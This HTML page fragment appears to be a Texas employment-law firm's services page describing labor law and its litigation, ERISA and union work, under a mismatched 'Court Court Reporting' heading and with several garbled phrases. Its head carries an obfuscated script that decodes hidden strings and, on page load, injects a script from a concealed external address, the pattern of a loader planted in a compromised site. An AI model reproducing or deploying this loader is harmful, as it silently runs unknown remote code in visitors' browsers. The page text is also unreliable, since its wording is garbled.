<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section">
    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Court <br> Court Reporting</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <p class="heading-5 first-letter">Employment law is designed to serve as a regulatory device, working our the lights and duties  between employers and workers. Also known simply as the labor law, the rules contained in it are primarily designed to keep workers safe and make sure they are treated fairly.</p>
          <p>Of course, for the overall balance of things, these laws also ensure that the employers' interests are just as administered and upheld.</p>
          <p>The main task of the labor law is to mediate the relationship between workers (employees), employers, trade unions and the government. Collective labor law relates to the tripartite relationship between employee, employer and union.</p>
          <p>If we're talking about which laws apply for Texas, than we can say that the employees working her are protected by many state and federal employment laws.</p>
          <p class="heading-5 first-letter">Just as the law mediates your relationship between the company and the worker, we want our law firm to be a mediator between you and the appliance of those laws. Here are the services that we provide:</p>
          <ul class="list-marked">
            <li>We litigate in Texas-based and federal courts</li>
            <li>Our attorneys do all the paperwork and negotiations to either uphold your case in trial or in order to achieve the favorable settlements on behalf of employees and workers</li>
            <li>On par with handling separate single cases on behalf of individual employees, we're also willing to bring class actions too</li>
            <li>Additionally to that, our vast team of attorneys represents employees with claims against their employer of discrimination, sexual harassment, or other improper treatment in violation of labor law.  Our lawyers represent workers not being paid their tips, commissions or minimum, prevailing, and overtime wages</li>
            <li>As a part of our effort to help the middle class, we review severance and other employment agreements for executives, managers and professionals. We arbitrate and litigate breach of non-compete or confidentiality clauses in employment contracts.</li>
            <li>Our employee benefits lawyers have represented a multitude of retirees seeking retirement and pension benefits under ERISA.</li>
            <li>As to working with the labor unions, we're also experienced in almost every aspect of labor-management relations and internal union affairs.</li>
            <li>We counsel welfare and pension plans about proper benefit fund administration.  We handle actions against fiduciaries alleging breach of fiduciary duty and failure to pay a benefit.</li>
          </ul>
        </article>
      </div>
    </div>
  </div>
</section>
